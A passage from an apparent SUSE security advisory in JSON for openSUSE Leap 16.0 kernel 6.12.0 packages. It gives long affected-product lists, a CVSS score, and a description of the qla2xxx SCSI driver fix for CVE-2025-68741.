"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2025-68735"
},
{
"cve": "CVE-2025-68741",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68741"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Fix improper freeing of purex item\n\nIn qla2xxx_process_purls_iocb(), an item is allocated via\nqla27xx_copy_multiple_pkt(), which internally calls\nqla24xx_alloc_purex_item().\n\nThe qla24xx_alloc_purex_item() function may return a pre-allocated item\nfrom a per-adapter pool for small allocations, instead of dynamically\nallocating memory with kzalloc().\n\nAn error handling path in qla2xxx_process_purls_iocb() incorrectly uses\nkfree() to release the item. If the item was from the pre-allocated\npool, calling kfree() on it is a bug that can lead to memory corruption.\n\nFix this by using the correct deallocation function,\nqla24xx_free_purex_item(), which properly handles both dynamically\nallocated and pre-allocated items.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
